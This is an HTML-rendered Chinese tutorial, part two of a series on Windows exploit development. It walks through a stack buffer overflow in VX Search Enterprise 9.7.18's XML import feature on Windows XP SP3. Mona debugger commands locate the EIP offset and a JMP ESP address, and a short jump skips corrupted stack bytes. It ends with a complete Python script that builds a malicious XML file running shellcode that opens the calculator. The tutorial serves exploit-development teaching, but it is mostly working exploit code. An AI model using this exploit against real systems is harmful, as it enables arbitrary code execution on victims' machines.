<!DOCTYPE html>
<html>
<head>
<title>part2</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1>Windows漏洞利用开发教程 Part 2：Short Jump</h1>
<p><image src="image/p1.jpg" /></p>
<h2>0x01 前言</h2>
<p>漏洞-信息安全界最常见的词汇，在百度百科是这样描述的。</p>
<p>漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。</p>
<p>本文主要介绍的是Windows软件漏洞的利用开发教程。</p>
<p>我花了大量的时间来研究了计算机安全领域Windows漏洞利用开发，希望能和大家分享一下，能帮助到对这方面感兴趣的朋友，如有不足，还请见谅。</p>
<h2>0x02 准备阶段</h2>
<p>欢迎阅读本系列文章的第二部分，如果你错过了第一部分，请点击下方传送门。</p>
<p>http://www.freebuf.com/articles/system/166500.html</p>
<p>本部分我们将介绍如何使用short jump来解决在堆栈上中断的shellcode。</p>
<p>我们需要准备以下工具：</p>
<pre><code>1、Windows XP SP3 32-bit系统iso镜像

2、Immunity Debugger-漏洞分析专用调试器

3、代码文本编辑器（个人喜好，我用的是notepad++）

4、VX Search Enterprise 9.7.18
</code></pre>

<p>VX Search是一款能够快速搜索电脑文件的工具软件，我们的目标是VX Search Enterprise版本9.7.18，你可以通过下面链接下载存在漏洞的程序。</p>
<pre><code>https://www.exploit-db.com/apps/746ec728a4cf975be799c7f509db383e-vxsearchent_setup_v9.7.18.exe
</code></pre>

<p>软件下载安装</p>
<p><image src="image/p2.png" /></p>
<h2>0x03 漏洞分析</h2>
<p>漏洞地址：</p>
<p>https://www.exploit-db.com/exploits/42181/</p>
<p>通过分析我们知道漏洞存在导入XML文档功能中。XML文档classify标签的name属性导致了堆栈缓冲区溢出。</p>
<p><image src="image/p3.png" /></p>
<h3>构造XML</h3>
<p>我们知道漏洞发生的地点，现在我们就要通过构造一个XML文档来促使程序发生崩溃。</p>
<pre><code># -*- coding: UTF-8 -*-

juck = &quot;A&quot; * 2000 #测试字符串

xmlpayload = '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;classify\nname=\'' + juck + '\n&lt;/classify&gt;'
xmlfp = open(&quot;payload.xml&quot;,&quot;w&quot;) #生成测试Payload文档
xmlfp.write(xmlpayload)
xmlfp.close()
</code></pre>

<p>通过Import Command选项导入payload.xml文件，程序发生崩溃。</p>
<p><image src="image/p4.png" /></p>
<h3>崩溃分析</h3>
<p>现在我们打开Immunity Debugger，然后File-Open打开vxsrchc.exe</p>
<p><image src="image/p5.png" /></p>
<p>点击Run program或者按F9让程序运行。</p>
<p><image src="image/p6.png" /></p>
<p>通过Import Command选项导入payload.xml文件，程序发生崩溃。</p>
<p><image src="image/p7.png" /></p>
<p>EIP成功被覆盖，第一部分介绍很详细了，这里不再过多介绍。</p>
<h2>0x04 漏洞利用开发</h2>
<p>现在我们想要利用这个控制并执行我们自己的控制代码。</p>
<h3>寻找EIP offset</h3>
<p>这里我们使用Immunity Debugger的插件mona，这样我们就避免了平常复杂的寻找方法。</p>
<p>安装mona：</p>
<p>https://github.com/corelan/mona</p>
<p>将mona.py放在Immunity Debugger安装目录PyCommands下就行了。</p>
<p>第一步：设置mona文本日志所在的文件夹</p>
<pre><code>!mona config -set workingfolder c:\logs\%p
15221322664340.png!small
</code></pre>

<p>第二步：生成2000个测试字符</p>
<pre><code>!mona pattern_create 1100
</code></pre>

<p>将测试字符复制到juck变量中，运行脚本生成payload.xml</p>
<p><image src="image/p8.png" /></p>
<p>通过Import Command选项导入payload.xml文件，程序发生崩溃。</p>
<p>可以发现EIP地址现在是0×42327A42</p>
<p>第三步:确定偏移量</p>
<pre><code>!mona pattern_offset 0x42327A42
</code></pre>

<p><image src="image/p9.png" /></p>
<p>我们找到了偏移量1536</p>
<h3>验证偏移量</h3>
<p>我们现在来验证一下偏移量是否正确。</p>
<pre><code># -*- coding: UTF-8 -*-
import struct

juck = &quot;\x41&quot;*1536  #偏移
eip = struct.pack(&quot;&lt;L&quot;, 0x42434445) #覆盖EIP为0x42434445
payload = juck + eip #组合payload
end = &quot;\x43&quot;*(2000 - len(payload)) #填补剩余的空间确保溢出
xmlpayload = '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;classify\nname=\'' + payload + end + '\n&lt;/classify&gt;'
xmlfp = open(&quot;payload.xml&quot;,&quot;w&quot;) #生成测试文件payload.xml
xmlfp.write(xmlpayload)
xmlfp.close()
</code></pre>

<p>生成文件后重复之前步骤，发现EIP被精准覆盖。</p>
<p><image src="image/p10.png" /></p>
<h3>寻找合适的地址覆盖EIP</h3>
<p>第一部分有介绍，这里我们就直接操作了，运行下列指令我们将得到一个jmp.txt</p>
<pre><code>!mona jmp -r esp
</code></pre>

<p><image src="image/p11.png" /></p>
<p>然后我们就得到一个地址0x7c8369f0，这个就是我们需要的EIP地址。</p>
<h3>开发测试</h3>
<p>现在shellcode我们先添加中断代码来测试一下。</p>
<pre><code># -*- coding: UTF-8 -*-
import struct

juck = &quot;\x41&quot;*1536                  #偏移
eip = struct.pack(&quot;&lt;L&quot;, 0x7c8369f0) #覆盖EIP为0x42434445
nops = &quot;\x90&quot; * 24                  #24字节的NOP
shellcode = &quot;\xCC&quot; * 250            #shellcode
payload = juck + eip + nops + shellcode                 #组合payload
end = &quot;\x43&quot;*(2000 - len(payload))  #填补剩余的空间确保溢出
xmlpayload = '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;classify\nname=\'' + payload + end + '\n&lt;/classify&gt;'
xmlfp = open(&quot;payload.xml&quot;,&quot;w&quot;)     #生成测试文件payload.xml
xmlfp.write(xmlpayload)
xmlfp.close()
</code></pre>

<p>运行脚本生成payload.xml，我们继续F9运行程序，通过Import Command选项导入payload.xml文件，程序发生崩溃。</p>
<p><image src="image/p12.png" /></p>
<p>重点来了，我们成功执行了我们的INT指令，但是看我们的shellcode在0x00112870和0x00112872处中断了，不用担心，这正好是我们学习使用short jump的机会。</p>
<h3>利用JMP解决中断的shellcode</h3>
<p>首先，我们要了解一些基本知识，我们的目标是跳过堆栈那一部分中断的shellcode。</p>
<p>在汇编中，指令JMP 10将导致指令指针IP跳过16个字节，JMP采用十六进制参数。</p>
<p>JMP指令参数范围是00h到7Fh，换句话说，JMP指令最大跳转为127个字节。</p>
<p>我们在使用雪橇跳板滑雪，在落地的时候需要一个缓冲地带来让我们平稳的落地，相同道理，在使用JMP指令跳转后我们需要放入NOP，我们希望JMP降落在NOP代码中间。</p>
<p>首先我们要将JMP 10翻译成目标代码（十六进制码），通过Mona命令</p>
<pre><code>!mona assemble -s “jmp 10”
</code></pre>

<p><image src="image/p13.png" /></p>
<p>我们得到了</p>
<pre><code>\xeb\x10
</code></pre>

<p>我们修改脚本</p>
<pre><code># -*- coding: UTF-8 -*-
import struct

juck = &quot;\x41&quot;*1536                  #偏移
eip = struct.pack(&quot;&lt;L&quot;, 0x7c8369f0) #覆盖EIP为0x42434445
nops = &quot;\x90&quot; * 24                  #24字节的NOP
shortjump = &quot;\xeb\x10&quot;              #short jump
nops1 = &quot;\x90&quot; * 20                 #20字节的NOP
shellcode = &quot;\xCC&quot; * 250            #shellcode
payload = juck + eip + nops + shortjump + nops1 + shellcode #组合payload
end = &quot;\x43&quot;*(2000 - len(payload))  #填补剩余的空间确保溢出
xmlpayload = '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;classify\nname=\'' + payload + end + '\n&lt;/classify&gt;'
xmlfp = open(&quot;payload.xml&quot;,&quot;w&quot;)     #生成测试文件payload.xml
xmlfp.write(xmlpayload)
xmlfp.close()
</code></pre>

<p>运行脚本生成payload.xml，我们继续F9运行程序，通过Import Command选项导入payload.xml文件，程序发生崩溃。</p>
<p><image src="image/p14.png" /></p>
<p>非常好，我们成功跳过堆栈那一部分中断的shellcode，并且安稳的在NOP区着陆。</p>
<h3>成品测试</h3>
<p>经过上面的分析，我们的脚本修改如下：</p>
<pre><code># -*- coding: UTF-8 -*-
import struct

juck = &quot;\x41&quot;*1536                  #偏移
eip = struct.pack(&quot;&lt;L&quot;, 0x7c8369f0) #覆盖EIP为0x42434445
nops = &quot;\x90&quot; * 24                  #24字节的NOP
shortjump = &quot;\xeb\x10&quot;              #short jump
nops1 = &quot;\x90&quot; * 20                 #20字节的NOP
shellcode = &quot;\x31\xC9&quot;                  # xor ecx,ecx
shellcode += &quot;\x51&quot;                     # push ecx
shellcode += &quot;\x68\x63\x61\x6C\x63&quot;     # push 0x636c6163
shellcode += &quot;\x54&quot;                     # push dword ptr esp
shellcode += &quot;\xB8\xAD\x23\x86\x7C&quot;     # mov eax,0x7c8623AD
shellcode += &quot;\xFF\xD0&quot;                 # call eax
payload = juck + eip + nops + shortjump + nops1 + shellcode #组合payload
end = &quot;\x43&quot;*(2000 - len(payload))  #填补剩余的空间确保溢出
xmlpayload = '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;classify\nname=\'' + payload + end + '\n&lt;/classify&gt;'
xmlfp = open(&quot;payload.xml&quot;,&quot;w&quot;)     #生成测试文件payload.xml
xmlfp.write(xmlpayload)
xmlfp.close()
</code></pre>

<p>shellcode的介绍请大家阅读第一部分文章。</p>
<p>运行脚本生成payload.xml，我们继续F9运行程序，通过Import Command选项导入payload.xml文件，程序发生崩溃并弹出计算器。</p>
<p><image src="image/p15.png" /></p>
<h2>0x05 总结</h2>
<p>我们第二部分总体是在第一部分的基础上，介绍了如何使用short jump来解决shellcode在堆栈上中断的问题，本人水平有限，如有不足，还请各位兄弟指出。</p>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
